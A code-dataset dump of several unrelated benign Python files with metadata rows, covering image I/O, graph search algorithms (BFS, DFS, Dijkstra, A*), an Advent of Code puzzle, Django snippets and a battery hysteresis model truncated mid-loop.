def zoom_names_table(self, session_id):
zoom_df = self._relevant_chat.loc[:, ["zoom_name", "id"]].rename(columns={"zoom_name": "name", "id": "student_id"})
zoom_df['session_id'] = pd.Series([session_id] * zoom_df.shape[0])
return zoom_df.sort_values(by="student_id", ascending=False).groupby("name").first().reset_index()
def chat_table(self, zoom_df):
relevant_chat = self._relevant_chat.drop(columns=["id"])
chat_session_table = pd.merge(relevant_chat, zoom_df, left_on="zoom_name", right_on="name")
return chat_session_table.drop(columns=["zoom_name", "name", "session_id", "student_id"]).rename(columns={"id": "zoom_names_id"})
| 55.386364
| 137
| 0.684858
| 2,416
| 0.991383
| 0
| 0
| 1,454
| 0.596635
| 0
| 0
| 695
| 0.285187
|
3c9f1d64c05ce80fd3ad121b31d428afa01b9e36
| 4,538
|
py
|
Python
|
project/image.py
|
Mandrenkov/SVBRDF-Texture-Synthesis
|
7e7282698befd53383cbd6566039340babb0a289
|
[
"MIT"
] | 2
|
2021-04-26T14:41:11.000Z
|
2021-08-20T09:13:03.000Z
|
project/image.py
|
Mandrenkov/SVBRDF-Texture-Synthesis
|
7e7282698befd53383cbd6566039340babb0a289
|
[
"MIT"
] | null | null | null |
project/image.py
|
Mandrenkov/SVBRDF-Texture-Synthesis
|
7e7282698befd53383cbd6566039340babb0a289
|
[
"MIT"
] | null | null | null |
import imageio # type: ignore
import logging
import numpy # type: ignore
import os
import pathlib
import torch
import torchvision # type: ignore
import utils
from torch import Tensor
from typing import Callable
def load(path: str, encoding: str = 'RGB') -> Tensor:
'''
Loads the image at the given path using the supplied encoding.
Args:
path: Path to the image.
encoding: Encoding of the image.
Returns:
Tensor [R, C, X] representing the normalized pixel values in the image.
'''
assert path, "Path cannot be empty or set to None."
array = imageio.imread(path)
device = utils.get_device_name()
image = torchvision.transforms.ToTensor()(array).to(device).permute(1, 2, 0)[:, :, :3]
if encoding == 'sRGB':
image = convert_sRGB_to_RGB(image)
elif encoding == 'Greyscale':
image = convert_RGB_to_greyscale(image)
elif encoding != 'RGB':
raise Exception(f'Image encoding "{encoding}" is not supported."')
logging.debug('Loaded image from "%s"', path)
return image
def save(path: str, image: Tensor, encoding: str = 'RGB') -> None:
'''
Saves the given image to the specified path using the supplied encoding.
Args:
path: Path to the image.
image: Tensor [R, C, X] of normalized pixel values in the image.
encoding: Encoding of the image.
'''
assert path, "Path cannot be empty or set to None."
assert torch.all(0 <= image) and torch.all(image <= 1), "Image values must fall in the closed range [0, 1]."
if encoding == 'sRGB':
image = convert_RGB_to_sRGB(image)
elif encoding == 'Greyscale':
image = convert_greyscale_to_RGB(image)
elif encoding != 'RGB':
raise Exception(f'Image encoding "{encoding}" is not supported."')
pathlib.Path(os.path.dirname(path)).mkdir(parents=True, exist_ok=True)
imageio.imwrite(path, torch.floor(255 * image).detach().cpu().numpy().astype(numpy.uint8))
logging.debug('Saved image to "%s"', path)
def clamp(function: Callable[[Tensor], Tensor]) -> Callable:
'''
Decorator which clamps an image destined for the given function to the range [ϵ, 1]. Note that ϵ is used in favour
of 0 to enable differentiation through fractional exponents.
Args:
function: Function that accepts an image Tensor as input.
Returns:
Wrapper which implements the aforementioned behaviour.
'''
return lambda image: function(image.clamp(1E-8, 1))
@clamp
def convert_sRGB_to_RGB(image: Tensor) -> Tensor:
'''
Converts an sRGB image into a linear RGB image.
Args:
image: Tensor [R, C, 3] of an sRGB image.
Returns:
Tensor [R, C, 3] of a linear RGB image.
'''
assert len(image.shape) >= 3 and image.size(-1) == 3, 'sRGB image must have dimensionality [*, R, C, 3].'
below = (image <= 0.04045) * image / 12.92
above = (image > 0.04045) * ((image + 0.055) / 1.055)**2.4
return below + above
@clamp
def convert_RGB_to_sRGB(image: Tensor) -> Tensor:
'''
Converts a linear RGB image into an sRGB image.
Args:
image: Tensor [R, C, 3] of a linear RGB image.
Returns:
Tensor [R, C, 3] of an sRGB image.
'''
assert len(image.shape) >= 3 and image.size(-1) == 3, 'RGB image must have dimensionality [*, R, C, 3].'
below = (image <= 0.0031308) * image * 12.92
above = (image > 0.0031308) * (1.055 * image**(1 / 2.4) - 0.055)
return below + above
def convert_RGB_to_greyscale(image: Tensor) -> Tensor:
'''
Converts a linear RGB image into a greyscale image.
Args:
image: Tensor [R, C, 3] of an RGB image.
Returns:
Tensor [R, C, 1] of a greyscale image.
'''
assert len(image.shape) == 3 and (image.size(2) == 1 or image.size(2) == 3), 'RGB image must have dimensionality [R, C, 1] or [R, C, 3].'
if image.size(2) == 3:
assert torch.all((image[:, :, 0] == image[:, :, 1]) & (image[:, :, 0] == image[:, :, 2])), 'RGB image must have the same value across each colour channel.'
return image[:, :, [0]]
return image
def convert_greyscale_to_RGB(image: Tensor) -> Tensor:
'''
Converts a greyscale image into a linear RGB image.
Args:
image: Tensor [R, C, 1] of a greyscale image.
Returns:
Tensor [R, C, 3] of a linear RGB image.
'''
assert len(image.shape) == 3 and image.size(2) == 1, 'Greyscale image must have dimensionality [R, C, 1].'
return image.expand(-1, -1, 3)
| 32.884058
| 163
| 0.628691
| 0
| 0
| 0
| 0
| 991
| 0.218282
| 0
| 0
| 2,254
| 0.496476
|
b1af4bb14846eb251b39a1c7a18e1ee46ffce810
| 12,611
|
py
|
Python
|
node_graph.py
|
JasonZhuGit/py_path_planner
|
e045a076c2c69284f1f977420ad93a966161e012
|
[
"Apache-2.0"
] | null | null | null |
node_graph.py
|
JasonZhuGit/py_path_planner
|
e045a076c2c69284f1f977420ad93a966161e012
|
[
"Apache-2.0"
] | null | null | null |
node_graph.py
|
JasonZhuGit/py_path_planner
|
e045a076c2c69284f1f977420ad93a966161e012
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import matplotlib.pyplot as plt
import numpy as np
from vertex import Vertex
from heap import PriorityQueue
class NodeGraph():
'''
    The NodeGraph concept comes from how computer science textbooks treat graphs
    in the mathematical sense―a set of vertices with edges connecting them.
    It contrasts with GridGraph, which looks like a tiled game map.
'''
pass
class LNodeGraph(NodeGraph): #save as linked list
def __init__(self, vertices=None, positions=None, weights=None, heuristic=None): #edges
self.vertices = vertices
self.positions = positions
self.weights = weights
self.heuristic = heuristic
@property
def vertices(self):
return self._vertices
@vertices.setter
def vertices(self, vertices=None):
self._vertices = {}
if isinstance(vertices, list):
for chain in vertices:
head = Vertex(chain[0])
head.weight = 0
for sub_vertex in chain[-1:0:-1]:
head.insert(sub_vertex, weight=1)
self._vertices[chain[0]] = head
@property
def weights(self): #weight saved in sub/copied vertex, return with edges
return self.edges
@weights.setter
def weights(self, weights):
if isinstance(weights, dict):
for from_u, head in self.vertices.items():
to_v = head.succ
while to_v:
edge = (from_u, to_v.name)
if edge in weights:
to_v.weight = weights[edge]
else:
to_v.weight = 0
to_v = to_v.succ
@property
def positions(self):
return self._positions
@positions.setter
def positions(self, positions):
self._positions = positions
@property
def heuristic(self):
_heuristic = {}
for name, ver in self.vertices.items():
_heuristic[name] = ver.heur
return _heuristic
@heuristic.setter
def heuristic(self, heuristic):
if isinstance(heuristic, dict):
for name, ver in self.vertices.items():
if name in heuristic:
ver.heur = heuristic[name]
else:
ver.heur = float('inf')
@property
def edges(self):
if not hasattr(self, "_edges"):
self._edges = {}
for from_u, chain in self.vertices.items():
to_v = chain.succ
while to_v:
self._edges[(from_u, to_v.name)] = to_v.weight
to_v = to_v.succ
return self._edges
def check_edge(self, from_u, to_v):
if from_u not in self.vertices or to_v not in self.vertices:
return False
succ = self.vertices[from_u].succ
while succ:
if succ.name == to_v:
return True
            succ = succ.succ
return False
def BFS_reset_vertices(self):
for v in self.vertices.values():
v.reset()
v.dist = float("inf")
def BFS(self, s):
if not s in self.vertices:
return False
self.BFS_reset_vertices()
self.vertices[s].visited = 1
self.vertices[s].dist = 0
self.vertices[s].weight = 0
queue = []
queue.append(s)
while queue:
from_u = queue.pop(0)
succ_ver = self.vertices[from_u].succ
while succ_ver:
to_v = succ_ver.name
if self.vertices[to_v].visited == 0:
self.vertices[to_v].visited = 1
self.vertices[to_v].prec = from_u #or self.vertices[from_u].dist
                    # The weighted distance is immediately overwritten below;
                    # plain BFS measures distance in hops, so only the +1 form is kept.
                    # self.vertices[to_v].dist = self.vertices[from_u].dist + succ_ver.weight
                    self.vertices[to_v].dist = self.vertices[from_u].dist + 1
queue.append(to_v)
succ_ver = succ_ver.succ
self.vertices[from_u].visited = 2
return True
def DFS_reset_vertices(self):
for v in self.vertices.values():
v.reset()
v.dist = float("inf")
def DFS_trackback(self, from_u):
self._steps += 1
self.vertices[from_u].entry = self._steps
self.vertices[from_u].visited = 1
succ_v = self.vertices[from_u].succ
while succ_v:
to_v = succ_v.name
if self.vertices[to_v].visited == 0:
self.vertices[to_v].prec = from_u
self.DFS_trackback(succ_v.name)
succ_v = succ_v.succ
self._steps += 1
self.vertices[from_u].back = self._steps
self.vertices[from_u].visited = 2
def DFS(self):
self.DFS_reset_vertices()
self._steps = 0
for from_u in self.vertices.keys():
if self.vertices[from_u].visited == 0:
self.DFS_trackback(from_u)
def Dijkstra_reset_vertices(self):
for vertex in self.vertices.values():
vertex.dist = float('inf')
vertex.prec = None
# vertex.visited = 0 # not used
def Dijkstra(self, start):
self.Dijkstra_reset_vertices()
self.vertices[start].dist = 0
        # Vertices may be enqueued all at once or incrementally; here all are enqueued up front.
        # Incremental insertion corresponds to the OPEN / CLOSE / UNUSED bookkeeping and keeps the queue smaller.
priQueue = PriorityQueue(list(self.vertices.values()), sortby='dist')
while priQueue:
from_u = priQueue.dequeue()
to_v = from_u.succ
while to_v:
new_dist = from_u.dist + to_v.weight
if new_dist < self.vertices[to_v.name].dist:
self.vertices[to_v.name].dist = new_dist
self.vertices[to_v.name].prec = from_u.name
to_v = to_v.succ
def AStar_reset_vertex(self):
for vertex in self.vertices.values():
vertex.dist = float('inf')
vertex.prec = None
# vertex.visited = 0 #not used
def AStar(self, start, goal):
self.AStar_reset_vertex()
self.vertices[start].dist = 0
        preQueue = PriorityQueue([self.vertices[start]], sortby=['dist', 'heur'])  # ordered by dist + heur
# preQueue is on behalf of OPEN
while preQueue:
            from_u = preQueue.dequeue()  # pick the vertex with the smallest dist + heur
if from_u.name == goal:
                return self.AStar_reconstruct_path(start, goal)  # rebuild the path by reversing the predecessor chain
else:
to_v = from_u.succ
while to_v:
tentative_dist = from_u.dist + to_v.weight
to_v_name = to_v.name
if tentative_dist < self.vertices[to_v_name].dist:
self.vertices[to_v_name].dist = tentative_dist
self.vertices[to_v_name].prec = from_u.name
if not to_v in preQueue:
                            preQueue.enqueue(self.vertices[to_v_name])  # re-visiting concern (popped, then pushed again): with a consistent heuristic each node is visited at most once, but could this loop forever otherwise?
to_v = to_v.succ
        return False  # goal not found
def AStar_reconstruct_path(self, start, goal):
path = [goal]
prec_u = self.vertices[goal].prec
while prec_u:
path.append(prec_u)
if prec_u == start:
break
prec_u = self.vertices[prec_u].prec
path = path[-1::-1]
return path
@property
def fig(self):
if not hasattr(self, "_fig"):
self._fig = plt.gcf()
self._fig.set_figheight(6)
self._fig.set_figwidth(12)
self._fig.gca().axis("off")
return self._fig
def draw_init(self):
return self.fig
def draw_vertices(self, heuristic=False, color='blue'):
pos_array = np.array(list(self.positions.values()))
plt.scatter(pos_array[:, 0], pos_array[:, 1],
s=1000, c=color, marker='o', alpha=0.9)
for name, pos in self.positions.items():
plt.annotate(name, (pos[0]-0.009, pos[1]-0.015),
fontsize=20, color='white', multialignment='center')
if heuristic:
plt.annotate("h="+str(self.vertices[name].heur), (pos[0]-0.02, pos[1]+0.09),
fontsize=15, color='black', backgroundcolor='white')
def draw_edges(self, weight=False, color='blue'):
for edge in self.edges.keys():
from_u = self.positions[edge[0]]
to_v = self.positions[edge[1]]
plt.plot([from_u[0], to_v[0]], [from_u[1], to_v[1]],
color=color, linewidth=2, alpha=0.9)
# edges' lables
if weight:
center = [(from_u[0] + to_v[0])/2-0.009, (from_u[1] + to_v[1])/2-0.015]
plt.annotate(self.edges[edge], center,
fontsize=15, color='black', backgroundcolor='white')
def draw_graph(self, node=True, edge=True, node_head=True, edge_label=True):
self.draw_vertices()
self.draw_edges()
def draw_tree(self, color='black'):
for to_v, head in self.vertices.items():
if head.prec:
from_u = self.positions[head.prec]
to_v = self.positions[to_v]
dx = from_u[0] - to_v[0]
dy = from_u[1] - to_v[1]
plt.arrow(to_v[0], to_v[1], dx, dy, length_includes_head=True,
head_width=0.03, head_length=0.03, shape='full', color=color)
def draw_BFS_tree(self, color='red'):
self.draw_tree(color=color)
def draw_DFS_forest(self, color='green'):
self.draw_tree(color=color)
def draw_Dijkstra_tree(self, color='magenta'): #'cyan' 'magenta'
self.draw_tree(color=color)
def draw_A_star_path(self, start, goal, color='cyan'):
self.draw_tree(color='magenta') #
to_v = goal
while to_v:
from_u = self.vertices[to_v].prec
if from_u:
to_pos = self.positions[to_v]
from_pos = self.positions[from_u]
dx = from_pos[0] - to_pos[0]
dy = from_pos[1] - to_pos[1]
plt.arrow(to_pos[0], to_pos[1], dx, dy, length_includes_head=True,
head_width=0.03, head_length=0.03, shape='full', color=color)
if from_u == start:
break
to_v = from_u
def show(self):
plt.show()
def save(self, name='graph.jpg'):
plt.savefig(name)
class MNodeGraph(NodeGraph): #save as matrix
def __init__(self):
pass
if __name__ == "__main__":
vertices = [['S', 'A', 'B', 'C'],
['A', 'S', 'D', 'E'],
['B', 'S', 'E', 'F'],
['C', 'S', 'K'],
['D', 'A', 'G'],
['E', 'A', 'B', 'G'],
['F', 'B', 'K', 'G'],
['K', 'C', 'F', 'G'],
['G', 'D', 'E', 'F', 'K']]
positions = {"S":[0.05, 0.5], #0
"A":[0.3, 0.8], #1
"B":[0.3, 0.5], #2
"C":[0.3, 0.2], #3
"D":[0.6, 0.95], #4
"E":[0.6, 0.65], #5
"F":[0.6, 0.4], #6
"K":[0.8, 0.2], #7
"G":[0.99, 0.5],} #8
weights = { ('S', 'A'): 9, ('S', 'B'): 6, ('S', 'C'): 8, ('A', 'S'): 9, ('B', 'S'): 6, ('C', 'S'): 8,
('A', 'D'): 7, ('A', 'E'): 9, ('D', 'A'): 7, ('E', 'A'): 9,
('B', 'E'): 8, ('B', 'F'): 8, ('E', 'B'): 8, ('F', 'B'): 8,
('C', 'K'): 20, ('K', 'C'): 20,
('D', 'G'): 16, ('G', 'D'): 16,
('E', 'G'): 13, ('G', 'E'): 13,
('F', 'G'): 13, ('F', 'K'): 5, ('G', 'F'): 13, ('K', 'F'): 5,
('K', 'G'): 6, ('G', 'K'): 6 }
heuristic = { "S": 20, #0
"A": 15, #1
"B": 17, #2
"C": 15, #3
"D": 11, #4
"E": 12, #5
"F": 10, #6
"K": 5, #7
"G": 0,} #8
lgraph = LNodeGraph(vertices, positions, weights, heuristic)
lgraph.BFS('S')
lgraph.draw_init()
lgraph.draw_vertices(heuristic=True)
lgraph.draw_edges(weight=True)
# lgraph.draw_BFS_tree()
# lgraph.DFS()
# lgraph.draw_DFS_forest()
# lgraph.Dijkstra('S')
# lgraph.draw_Dijkstra_tree()
lgraph.AStar('S', 'G')
lgraph.draw_A_star_path('S', 'G')
lgraph.show()
| 35.624294
| 135
| 0.505273
| 10,749
| 0.837476
| 0
| 0
| 2,219
| 0.172887
| 0
| 0
| 1,604
| 0.124971
|
b1b2da34505536ccd8a8d170d37deaec68c901e7
| 1,534
|
py
|
Python
|
Y2018/Day09.py
|
dnsdhrj/advent-of-code-haskell
|
160257960c7995f3e54f889b3d893894bc898005
|
[
"BSD-3-Clause"
] | 7
|
2020-11-28T10:29:45.000Z
|
2022-02-03T07:37:54.000Z
|
Y2018/Day09.py
|
sonowz/advent-of-code-haskell
|
160257960c7995f3e54f889b3d893894bc898005
|
[
"BSD-3-Clause"
] | null | null | null |
Y2018/Day09.py
|
sonowz/advent-of-code-haskell
|
160257960c7995f3e54f889b3d893894bc898005
|
[
"BSD-3-Clause"
] | null | null | null |
import re
class Doubly:
def __init__(self, value, prev=None, next=None):
self.value = value
self.prev = prev or self
self.next = next or self
def move(self, n):
curr = self
for i in range(abs(n)):
if n < 0:
curr = curr.prev
else:
curr = curr.next
return curr
def insert(self, v):
prev = self.prev
new_node = Doubly(v, prev, self)
prev.next = new_node
self.prev = new_node
return new_node
# Make sure 'del' this too
def delete(self):
self.prev.next = self.next
self.next.prev = self.prev
return self.value, self.next
def put_marble(t, c):
return c.move(2).insert(t)
def put_marble_23(n_player, t, c, s):
player = t % n_player
p1 = t
(p2, nc) = c.move(-7).delete()
del c
s[player] += p1 + p2
return nc, s
def game(n_player, max_turn):
c = Doubly(0)
s = [0 for i in range(n_player + 1)]
for t in range(1, max_turn + 1):
if t % 23 != 0:
c = put_marble(t, c)
else:
(c, s) = put_marble_23(n_player, t, c, s)
return s
def solve1(n_player, turn):
return max(game(n_player, turn))
def solve2(n_player, turn):
return max(game(n_player, turn * 100))
with open('09.txt') as f:
line = f.read()
[n_player, turn] = [int(x) for x in re.search(r'(\d+)[^\d]*(\d+).*$', line).groups()]
print(solve1(n_player, turn))
print(solve2(n_player, turn))
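# Quick check (per the puzzle's worked example): with 9 players and a last marble
# worth 25 points the high score is 32, i.e. max(game(9, 25)) == 32.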
| 23.96875
| 89
| 0.541069
| 696
| 0.453716
| 0
| 0
| 0
| 0
| 0
| 0
| 56
| 0.036506
|
b1b3c90a89f10cc3abca5ea3c241070e29f4d3b5
| 628
|
py
|
Python
|
examples/consulta_preco.py
|
deibsoncarvalho/tabela-fipe-api
|
2890162e4436611326f0b878f647f344a8d52626
|
[
"Apache-2.0"
] | null | null | null |
examples/consulta_preco.py
|
deibsoncarvalho/tabela-fipe-api
|
2890162e4436611326f0b878f647f344a8d52626
|
[
"Apache-2.0"
] | null | null | null |
examples/consulta_preco.py
|
deibsoncarvalho/tabela-fipe-api
|
2890162e4436611326f0b878f647f344a8d52626
|
[
"Apache-2.0"
] | null | null | null |
from fipeapi import CARRO, CAMINHAO, MOTO, consulta_preco_veiculo, pega_anos_modelo, pega_modelos
from time import sleep
def consulta_preco(marca="HONDA"):
modelo = pega_modelos(tipo_veiculo=CAMINHAO, marca=marca)[0]['modelo']
print(f"\nAnos do Modelo {modelo} da {marca}:")
sleep(2)
anos = pega_anos_modelo(marca=marca, modelo=modelo, tipo_veiculo=CAMINHAO)[0]
preco = consulta_preco_veiculo(tipo_veiculo=CAMINHAO, marca=marca, modelo=modelo,
ano_do_modelo=anos['ano'], combustivel=anos['combustivel'])
print(preco)
if __name__ == '__main__':
consulta_preco()
| 36.941176
| 97
| 0.705414
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 83
| 0.132166
|
b1b43acb4fa91071f5f63c2486fa86ca051d0487
| 247
|
py
|
Python
|
servo/views/tags.py
|
ipwnosx/Servo
|
3418ece690ca90d676a7d8ae654da7770ae312fb
|
[
"BSD-2-Clause"
] | null | null | null |
servo/views/tags.py
|
ipwnosx/Servo
|
3418ece690ca90d676a7d8ae654da7770ae312fb
|
[
"BSD-2-Clause"
] | null | null | null |
servo/views/tags.py
|
ipwnosx/Servo
|
3418ece690ca90d676a7d8ae654da7770ae312fb
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from django.http import HttpResponse
from servo.models import TaggedItem
def clear(request, pk):
TaggedItem.objects.get(pk=pk).delete()
return HttpResponse("")
def add(request, content_type, pk, tag):
pass
| 17.642857
| 42
| 0.696356
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 25
| 0.101215
|
b1b47b065e5504e7082a3670697994dcf84ff418
| 853
|
py
|
Python
|
isubscribe/management/commands/announce.py
|
ilavender/sensu_drive
|
e874024aa157c7076ccc9465e9d6ae00a4f19fd0
|
[
"MIT"
] | 71
|
2016-12-25T12:06:07.000Z
|
2021-02-21T21:14:48.000Z
|
isubscribe/management/commands/announce.py
|
ilavender/sensu_drive
|
e874024aa157c7076ccc9465e9d6ae00a4f19fd0
|
[
"MIT"
] | 7
|
2016-12-23T23:18:45.000Z
|
2021-06-10T18:58:14.000Z
|
isubscribe/management/commands/announce.py
|
ilavender/sensu_drive
|
e874024aa157c7076ccc9465e9d6ae00a4f19fd0
|
[
"MIT"
] | 30
|
2017-01-01T16:18:19.000Z
|
2021-04-21T15:06:47.000Z
|
from django.core.management.base import BaseCommand, CommandError
from channels import Channel, Group, channel_layers
import json
from builtins import str
class Command(BaseCommand):
help = 'Send text announcement on notifications channel (events view)'
def add_arguments(self, parser):
parser.add_argument(
'-m',
'--message',
dest='message',
required=True,
help='announcement message text',
metavar = "MESSAGE"
)
def handle(self, *args, **options):
Group("announcement").send({
"text": json.dumps({'announce':True,
'message': options['message']
})
})
self.stdout.write('announcement done\n')
| 27.516129
| 74
| 0.52755
| 691
| 0.810082
| 0
| 0
| 0
| 0
| 0
| 0
| 192
| 0.225088
|
b1b9101a00a5671a8a714dcff7906632b6da9851
| 849
|
py
|
Python
|
jcms/models/generic_menu_item.py
|
jessielaf/jcms-pip
|
ba0580c7cf229b099c17f0286d148018dabf8aa8
|
[
"MIT"
] | null | null | null |
jcms/models/generic_menu_item.py
|
jessielaf/jcms-pip
|
ba0580c7cf229b099c17f0286d148018dabf8aa8
|
[
"MIT"
] | null | null | null |
jcms/models/generic_menu_item.py
|
jessielaf/jcms-pip
|
ba0580c7cf229b099c17f0286d148018dabf8aa8
|
[
"MIT"
] | null | null | null |
from typing import List, Optional
from django.template.defaultfilters import slugify
from jcms.models.single_menu_item import SingleMenuItem
class GenericMenuItem:
"""
Generic menu item that can be seen in the left bar in the cms
"""
    def __init__(self, title: str, single_menu_items: List[SingleMenuItem], slug: Optional[str] = None):
"""
:param slug: The slug the single menu items will have in front of them
:type slug: str
:param title: Display name for the MenuItem
:type title: str
:param single_menu_items: SingleMenuItems that are shown as children
:type single_menu_items: List[SingleMenuItem]
"""
if slug:
self.slug = slug
else:
self.slug = slugify(title)
self.title = title
self.single_menu_items = single_menu_items
| 30.321429
| 95
| 0.657244
| 715
| 0.842167
| 0
| 0
| 0
| 0
| 0
| 0
| 403
| 0.474676
|
b1ba9b4717e2cdd9d9bb6e7e1745006030876674
| 9,572
|
py
|
Python
|
SOC_Photon/Battery State/EKF/sandbox/Hysteresis.py
|
davegutz/myStateOfCharge
|
d03dc5e92a9561d4b28be271d4eabe40b48b32ce
|
[
"MIT"
] | 1
|
2021-12-03T08:56:33.000Z
|
2021-12-03T08:56:33.000Z
|
SOC_Photon/Battery State/EKF/sandbox/Hysteresis.py
|
davegutz/myStateOfCharge
|
d03dc5e92a9561d4b28be271d4eabe40b48b32ce
|
[
"MIT"
] | null | null | null |
SOC_Photon/Battery State/EKF/sandbox/Hysteresis.py
|
davegutz/myStateOfCharge
|
d03dc5e92a9561d4b28be271d4eabe40b48b32ce
|
[
"MIT"
] | null | null | null |
# Hysteresis class to model battery charging / discharge hysteresis
# Copyright (C) 2022 Dave Gutz
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation;
# version 2.1 of the License.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# See http://www.fsf.org/licensing/licenses/lgpl.txt for full license text.
__author__ = 'Dave Gutz <davegutz@alum.mit.edu>'
__version__ = '$Revision: 1.1 $'
__date__ = '$Date: 2022/01/08 13:15:02 $'
import numpy as np
from pyDAGx.lookup_table import LookupTable
class Hysteresis():
# Use variable resistor to create hysteresis from an RC circuit
def __init__(self, t_dv=None, t_soc=None, t_r=None, cap=3.6e6, scale=1.):
# Defaults
if t_dv is None:
t_dv = [-0.09, -0.07,-0.05, -0.03, 0.000, 0.03, 0.05, 0.07, 0.09]
if t_soc is None:
t_soc = [0, .5, 1]
if t_r is None:
t_r = [1e-7, 0.0064, 0.0050, 0.0036, 0.0015, 0.0024, 0.0030, 0.0046, 1e-7,
1e-7, 1e-7, 0.0050, 0.0036, 0.0015, 0.0024, 0.0030, 1e-7, 1e-7,
1e-7, 1e-7, 1e-7, 0.0036, 0.0015, 0.0024, 1e-7, 1e-7, 1e-7]
for i in range(len(t_dv)):
t_dv[i] *= scale
t_r[i] *= scale
self.lut = LookupTable()
self.lut.addAxis('x', t_dv)
self.lut.addAxis('y', t_soc)
self.lut.setValueTable(t_r)
self.cap = cap / scale # maintain time constant = R*C
self.res = 0.
self.soc = 0.
self.ib = 0.
self.ioc = 0.
self.voc_stat = 0.
self.voc = 0.
self.dv_hys = 0.
self.dv_dot = 0.
self.saved = Saved()
def __str__(self, prefix=''):
s = prefix + "Hysteresis:\n"
res = self.look_hys(dv=0., soc=0.8)
s += " res(median) = {:6.4f} // Null resistance, Ohms\n".format(res)
s += " cap = {:10.1f} // Capacitance, Farads\n".format(self.cap)
s += " tau = {:10.1f} // Null time constant, sec\n".format(res*self.cap)
s += " ib = {:7.3f} // Current in, A\n".format(self.ib)
s += " ioc = {:7.3f} // Current out, A\n".format(self.ioc)
s += " voc_stat = {:7.3f} // Battery model voltage input, V\n".format(self.voc_stat)
s += " voc = {:7.3f} // Discharge voltage output, V\n".format(self.voc)
s += " soc = {:7.3f} // State of charge input, dimensionless\n".format(self.soc)
s += " res = {:7.3f} // Variable resistance value, ohms\n".format(self.res)
s += " dv_dot = {:7.3f} // Calculated voltage rate, V/s\n".format(self.dv_dot)
s += " dv_hys = {:7.3f} // Delta voltage state, V\n".format(self.dv_hys)
return s
def calculate_hys(self, ib, voc_stat, soc):
self.ib = ib
self.voc_stat = voc_stat
self.soc = soc
self.res = self.look_hys(self.dv_hys, self.soc)
self.ioc = self.dv_hys / self.res
self.dv_dot = -self.dv_hys / self.res / self.cap + self.ib / self.cap
def init(self, dv_init):
self.dv_hys = dv_init
def look_hys(self, dv, soc):
self.res = self.lut.lookup(x=dv, y=soc)
return self.res
def save(self, time):
self.saved.time.append(time)
self.saved.soc.append(self.soc)
self.saved.res.append(self.res)
self.saved.dv_hys.append(self.dv_hys)
self.saved.dv_dot.append(self.dv_dot)
self.saved.ib.append(self.ib)
self.saved.ioc.append(self.ioc)
self.saved.voc_stat.append(self.voc_stat)
self.saved.voc.append(self.voc)
def update(self, dt):
self.dv_hys += self.dv_dot * dt
self.voc = self.voc_stat + self.dv_hys
return self.voc
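# Model recap (restating the equations coded above): the hysteresis state integrates
#   dv_dot = (ib - dv_hys / R(dv_hys, soc)) / C
# with forward Euler, dv_hys += dv_dot * dt, and the output is voc = voc_stat + dv_hys,
# so R*C sets the relaxation time constant and ib*R the steady-state offset.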
class Saved:
    # For saving plot data. A better approach is the 'Saver' class in the pyfilter helpers, which requires a __dict__.
def __init__(self):
self.time = []
self.dv_hys = []
self.dv_dot = []
self.res = []
self.soc = []
self.ib = []
self.ioc = []
self.voc = []
self.voc_stat = []
if __name__ == '__main__':
import sys
import doctest
from datetime import datetime
from unite_pictures import unite_pictures_into_pdf
import os
doctest.testmod(sys.modules['__main__'])
import matplotlib.pyplot as plt
def overall(hys=Hysteresis().saved, filename='', fig_files=None, plot_title=None, n_fig=None, ref=None):
if fig_files is None:
fig_files = []
if ref is None:
ref = []
plt.figure()
n_fig += 1
plt.subplot(221)
plt.title(plot_title)
plt.plot(hys.time, hys.soc, color='red', label='soc')
plt.legend(loc=3)
plt.subplot(222)
plt.plot(hys.time, hys.res, color='black', label='res, Ohm')
plt.legend(loc=3)
plt.subplot(223)
plt.plot(hys.time, hys.ib, color='blue', label='ib, A')
plt.plot(hys.time, hys.ioc, color='green', label='ioc, A')
plt.legend(loc=2)
plt.subplot(224)
plt.plot(hys.time, hys.dv_hys, color='red', label='dv_hys, V')
plt.legend(loc=2)
fig_file_name = filename + "_" + str(n_fig) + ".png"
fig_files.append(fig_file_name)
plt.savefig(fig_file_name, format="png")
plt.figure()
n_fig += 1
plt.subplot(111)
plt.title(plot_title)
plt.plot(hys.soc, hys.voc, color='red', label='voc vs soc')
plt.legend(loc=2)
fig_file_name = filename + "_" + str(n_fig) + ".png"
fig_files.append(fig_file_name)
plt.savefig(fig_file_name, format="png")
return n_fig, fig_files
class Pulsar:
def __init__(self):
self.time_last_hold = 0.
self.time_last_rest = -100000.
self.holding = False
self.resting = True
self.index = -1
self.amp = [100., 0., -100., -100., -100., -100., -100., -100., -100., -100., -100., -100.,
100., 100., 100., 100., 100., 100., 100., 100., 100., 100.]
self.dur = [16000., 0., 600., 600., 600., 600., 600., 600., 600., 600., 600., 600.,
600., 600., 600., 600., 600., 600., 600., 600., 600., 600.]
self.rst = [600., 7200., 3600., 3600., 3600., 3600., 3600., 3600., 3600., 3600., 3600., 7200.,
3600., 3600., 3600., 3600., 3600., 3600., 3600., 3600., 3600., 46800.]
self.pulse_value = self.amp[0]
self.end_time = self.time_end()
def calculate(self, time):
if self.resting and time >= self.time_last_rest + self.rst[self.index]:
if time < self.end_time:
self.index += 1
self.resting = False
self.holding = True
self.time_last_hold = time
self.pulse_value = self.amp[self.index]
elif self.holding and time >= self.time_last_hold + self.dur[self.index]:
self.index += 0 # only advance after resting
self.resting = True
self.holding = False
self.time_last_rest = time
self.pulse_value = 0.
return self.pulse_value
def time_end(self):
time = 0
for du in self.dur:
time += du
for rs in self.rst:
time += rs
return time
def main():
# Setup to run the transients
dt = 10
# time_end = 2
# time_end = 500000
pull = Pulsar()
time_end = pull.time_end()
hys = Hysteresis()
# Executive tasks
t = np.arange(0, time_end + dt, dt)
soc = 0.2
current_in_s = []
# time loop
for i in range(len(t)):
if t[i] < 10000:
current_in = 0
elif t[i] < 20000:
current_in = 40
elif t[i] < 30000:
current_in = -40
elif t[i] < 80000:
current_in = 8
elif t[i] < 130000:
current_in = -8
elif t[i] < 330000:
current_in = 2
elif t[i] < 440000:
current_in = -2
else:
